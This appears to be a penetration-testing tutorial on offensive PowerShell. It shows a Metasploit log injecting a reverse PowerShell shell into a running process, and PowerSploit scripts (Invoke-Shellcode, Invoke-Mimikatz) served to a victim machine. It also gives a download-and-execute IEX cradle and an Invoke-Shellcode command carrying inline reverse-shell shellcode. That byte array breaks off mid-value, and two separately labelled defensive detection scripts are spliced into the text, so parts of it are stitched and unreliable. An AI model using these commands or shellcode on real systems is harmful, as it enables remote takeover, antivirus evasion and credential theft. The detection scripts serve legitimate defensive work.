PowerShell is so powerful
What is PowerShell?
PowerShell is an automation platform and scripting language for Windows and Windows Server that allows you to simplify the management of your systems. Unlike other text-based shells, PowerShell harnesses the power of the .NET Framework, providing rich objects and a massive set of built-in functionality for taking control of your Windows environments.
msf post(exec_powershell) > use post/windows/manage/payload_inject
msf post(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp
PAYLOAD => windows/powershell_reverse_tcp
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 1 no Select the amount of shells you want to spawn.
HANDLER false no Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/powershell_reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set LHOST 192.168.0.114
LHOST => 192.168.0.114
msf post(payload_inject) > set SESSION 1
SESSION => 1
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > run
[*] Running module against LAB
[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[*] Started reverse SSL handler on 192.168.0.114:4433
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Interactive Powershell Session, Reverse TCP into process ID 352
[*] Opening process 352
[*] Starting the payload handler...
[*] Generating payload
[*] Allocating memory in procees 352
[*] Allocated memory at address 0x00120000, for 1723 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 352
[*] Post module execution completed
msf post(payload_inject) > [*] Powershell session session 2 opened (192.168.0.114:4433 -> 192.168.0.108:5460) at 2016-10-15 03:24:22 -0500
msf post(payload_inject) > sess 2
[*] Starting interaction with 2...
Windows PowerShell running as user test on LAB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\test>Get-Command -Name get-*
CommandType Name ModuleName
----------- ---- ----------
Function Get-DscConfiguration PSDesiredStateConfiguration
Function Get-DscLocalConfigurationManager PSDesiredStateConfiguration
Function Get-DscResource PSDesiredStateConfiguration
Function Get-FileHash Microsoft.PowerShell.Utility
Function Get-IseSnippet ISE
Function Get-LogProperties PSDiagnostics
Function Get-Verb
Function Get-Webclient
Cmdlet Get-Acl Microsoft.PowerShell.Security
Cmdlet Get-Alias Microsoft.PowerShell.Utility
Cmdlet Get-AppLockerFileInformation AppLocker
Cmdlet Get-AppLockerPolicy AppLocker
Cmdlet Get-AuthenticodeSignature Microsoft.PowerShell.Security
Cmdlet Get-BitsTransfer BitsTransfer
Cmdlet Get-ChildItem Microsoft.PowerShell.Management
Cmdlet Get-ChildPrimitive TShell
Cmdlet Get-CimAssociatedInstance CimCmdlets
Cmdlet Get-CimClass CimCmdlets
Cmdlet Get-CimInstance CimCmdlets
Cmdlet Get-CimSession CimCmdlets
Cmdlet Get-Command Microsoft.PowerShell.Core
Cmdlet Get-ComputerRestorePoint Microsoft.PowerShell.Management
Cmdlet Get-Content Microsoft.PowerShell.Management
Cmdlet Get-ControlPanelItem Microsoft.PowerShell.Management
Cmdlet Get-Counter Microsoft.PowerShell.Diagnostics
Cmdlet Get-Credential Microsoft.PowerShell.Security
Cmdlet Get-Culture Microsoft.PowerShell.Utility
Cmdlet Get-Date Microsoft.PowerShell.Utility
Cmdlet Get-Device TShell
Cmdlet Get-Event Microsoft.PowerShell.Utility
Cmdlet Get-EventLog Microsoft.PowerShell.Management
Cmdlet Get-EventSubscriber Microsoft.PowerShell.Utility
Cmdlet Get-ExecutionPolicy Microsoft.PowerShell.Security
Cmdlet Get-FormatData Microsoft.PowerShell.Utility
Cmdlet Get-Help Microsoft.PowerShell.Core
Cmdlet Get-History Microsoft.PowerShell.Core
Cmdlet Get-Host Microsoft.PowerShell.Utility
Cmdlet Get-HotFix Microsoft.PowerShell.Management
Cmdlet Get-Item Microsoft.PowerShell.Management
Cmdlet Get-ItemProperty Microsoft.PowerShell.Management
Cmdlet Get-Job Microsoft.PowerShell.Core
Cmdlet Get-JobTrigger PSScheduledJob
Cmdlet Get-Location Microsoft.PowerShell.Management
Cmdlet Get-Member Microsoft.PowerShell.Utility
Cmdlet Get-Module Microsoft.PowerShell.Core
Cmdlet Get-PfxCertificate Microsoft.PowerShell.Security
Cmdlet Get-Process Microsoft.PowerShell.Management
Cmdlet Get-PSBreakpoint Microsoft.PowerShell.Utility
Cmdlet Get-PSCallStack Microsoft.PowerShell.Utility
Cmdlet Get-PSDrive Microsoft.PowerShell.Management
Cmdlet Get-PSProvider Microsoft.PowerShell.Management
Cmdlet Get-PSSession Microsoft.PowerShell.Core
Cmdlet Get-PSSessionConfiguration Microsoft.PowerShell.Core
Cmdlet Get-PSSnapin Microsoft.PowerShell.Core
Cmdlet Get-Random Microsoft.PowerShell.Utility
Cmdlet Get-ResultSummary TShell
Cmdlet Get-ScheduledJob PSScheduledJob
Cmdlet Get-ScheduledJobOption PSScheduledJob
Cmdlet Get-Service Microsoft.PowerShell.Management
Cmdlet Get-SuiteName TShell
Cmdlet Get-TaskOutputPath TShell
Cmdlet Get-TraceSource Microsoft.PowerShell.Utility
Cmdlet Get-Transaction Microsoft.PowerShell.Management
Cmdlet Get-TroubleshootingPack TroubleshootingPack
Cmdlet Get-TypeData Microsoft.PowerShell.Utility
Cmdlet Get-UICulture Microsoft.PowerShell.Utility
Cmdlet Get-Unique Microsoft.PowerShell.Utility
Cmdlet Get-Variable Microsoft.PowerShell.Utility
Cmdlet Get-WinEvent Microsoft.PowerShell.Diagnostics
Cmdlet Get-WmiObject Microsoft.PowerShell.Management
Cmdlet Get-WSManCredSSP Microsoft.WSMan.Management
Cmdlet Get-WSManInstance Microsoft.WSMan.Management
PS C:\Users\test>
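The payload_inject run above plants a PowerShell stager inside an arbitrary process (PID 352), so the resulting session is not hosted by powershell.exe at all. A defender can hunt for exactly that: any process that has loaded the PowerShell engine (System.Management.Automation*.dll) but is not a known PowerShell host. The script below is an added example, not part of the original article or of Metasploit; the list of known hosts is an assumption you should adjust to your environment.

```powershell
# Added example (not from the original article): find processes hosting the
# PowerShell engine that are not known PowerShell hosts. Injected PowerShell
# payloads, such as the one payload_inject writes into PID 352 above, show up
# this way. Run from an elevated prompt so every process is visible.

# Assumed list of legitimate engine hosts; extend it for your environment.
$knownHosts = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost', 'sqlps')

function Find-UnexpectedPowerShellHost {
    param([string[]]$KnownHosts = $knownHosts)

    foreach ($proc in Get-Process) {
        if ($KnownHosts -contains $proc.Name) { continue }
        try {
            # .Modules throws for protected processes and for a different
            # bitness (32-bit vs 64-bit); those are skipped, not reported.
            $automation = @($proc.Modules |
                Where-Object { $_.ModuleName -like 'System.Management.Automation*' })
            if ($automation.Count -gt 0) {
                [pscustomobject]@{
                    Pid       = $proc.Id
                    Name      = $proc.Name
                    Path      = $proc.Path
                    StartTime = $proc.StartTime
                    Module    = $automation[0].FileName
                }
            }
        } catch {
            continue
        }
    }
}

# Anything listed here deserves a look at its parent, command line and
# outbound connections (the session above called back to 192.168.0.114:4433).
Find-UnexpectedPowerShellHost | Format-Table -AutoSize
```

A hit is not proof on its own: some management agents legitimately host the engine, which is why the known-host list is a parameter.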
PowerSploit
PowerSploit is a collection of PowerShell scripts that are useful during the exploitation and, above all, the post-exploitation phases of a penetration test.
If you have Git installed, you can fetch all files from the GitHub repository with the following command:
┌─[]─[/opt]
└──╼ sudo git clone https://github.com/PowerShellMafia/PowerSploit
[sudo] password for lab:
Cloning into 'PowerSploit'...
remote: Counting objects: 1586, done.
remote: Total 1586 (delta 0), reused 0 (delta 0), pack-reused 1586
Receiving objects: 100% (1586/1586), 5.89 MiB | 43.00 KiB/s, done.
Resolving deltas: 100% (789/789), done.
Checking connectivity... done.
To run PowerSploit scripts, you need Microsoft PowerShell. It ships with Windows 7 and later versions of Windows.
In the current scenario we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit), which has PowerShell installed, and we run the PowerSploit tools on it.
To make the PowerSploit scripts easy to fetch and run from the victim machine, we start a web server with Python:
┌─[(master)]─[/opt/PowerSploit]
└──╼ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.1.103 - - [08/Nov/2015 13:53:23] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 13:53:23] code 404, message File not found
192.168.1.103 - - [08/Nov/2015 13:53:23] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.103 - - [08/Nov/2015 13:55:04] "GET /CodeExecution/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 13:55:19] "GET /CodeExecution/Invoke--Shellcode.ps1 HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:00:23] "GET /CodeExecution/Usage.md HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:26] "GET /Recon/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:34] "GET /Persistence/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:01:43] "GET /Recon/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:02:11] "GET /Recon/Invoke-Portscan.ps1 HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:05:47] "GET /Exfiltration/ HTTP/1.1" 200 -
192.168.1.103 - - [08/Nov/2015 14:07:45] "GET /Exfiltration/Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
PowerSploit organizes its scripts into clearly named categories:
| Name | Description |
|---|---|
| Antivirus Bypass | Find the bytes of a file that match an antivirus signature. |
| Code Execution | Execute code on the victim machine. |
| Exfiltration | Manipulate and collect information and data from the victim machine(s). |
| Persistence | Maintain control of the machine by adding persistence to scripts. |
| PE Tools | Handy PowerShell cmdlets for enumeration. |
| Recon | Perform reconnaissance tasks from the victim machine. |
| Reverse Engineering | Help with reverse engineering and malware analysis. This category has since moved to PowerShellArsenal. |
| Script Modification | Create and manipulate scripts on the victim machine. |
This article covers as many PowerSploit scripts as possible; those not covered are left for the reader to try and test. Depending on the script, a particular environment may be required for it to work (for example, an Active Directory domain for some of the Exfiltration scripts).
Install and run a PowerShell script
IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")
When run in PowerShell, this command downloads the script text and loads its functions into memory for the current PowerShell process only; nothing is installed permanently, and the functions are gone once that process exits.
Invoke-Shellcode
This cmdlet injects custom shellcode or a Metasploit payload into a new or an existing process and executes it. The advantage of using this script is that no file is written to disk, so it is not flagged by antivirus.
We can easily load the Code Execution script “Invoke-Shellcode” using:
powershell.exe -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1');Invoke-Shellcode -Force -ShellCode @(0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x72,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0
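Both the generic download cradle (IEX plus Net.WebClient.DownloadString) and the Invoke-Shellcode one-liner above never touch disk, but PowerShell 5 and later script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the text of every script block that runs. The check below is an added example for defenders, not part of the original article or of PowerSploit; the sample script blocks and the pattern list are constructed for the demo.

```powershell
# Added example (not from the original article): flag script blocks that look
# like the download-and-Invoke-Expression cradle or the Invoke-Shellcode call
# shown on this page. Patterns are an assumption; tune them to your telemetry.

$cradlePatterns = @(
    'Net\.WebClient.*DownloadString',      # remote fetch straight into memory
    '\b(IEX|Invoke-Expression)\b',         # executes a string as code
    'Invoke-Shellcode',                    # PowerSploit injector, by name
    '-ShellCode\s+@\(\s*0x[0-9a-f]{2}'     # inline byte array passed as shellcode
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    # @() keeps an empty pipeline result as an empty array, not $null
    $hits = @($cradlePatterns | Where-Object { $ScriptBlockText -match $_ })
    [pscustomobject]@{
        Matched    = $hits.Count
        Patterns   = ($hits -join '; ')
        Suspicious = ($hits.Count -ge 2)   # a single hit is noisy; two is a cradle
        Preview    = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
    }
}

# Constructed samples: the page's cradle, a benign admin command, a PowerSploit call.
$samples = @(
    'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/Recon/Invoke-Portscan.ps1")',
    'Get-Service | Where-Object Status -eq Running | Export-Csv services.csv',
    'Invoke-Shellcode -Force -ShellCode @(0xfc,0xe8,0x82,0x00)'
)
$samples | ForEach-Object { Test-SuspiciousScriptBlock $_ } | Format-Table -AutoSize

# Against the real log (script block logging must be enabled by policy):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { Test-SuspiciousScriptBlock $_.Properties[2].Value } |
#     Where-Object Suspicious
```

With the samples as constructed, the first and third blocks match two patterns each and are flagged, while the Get-Service line matches none.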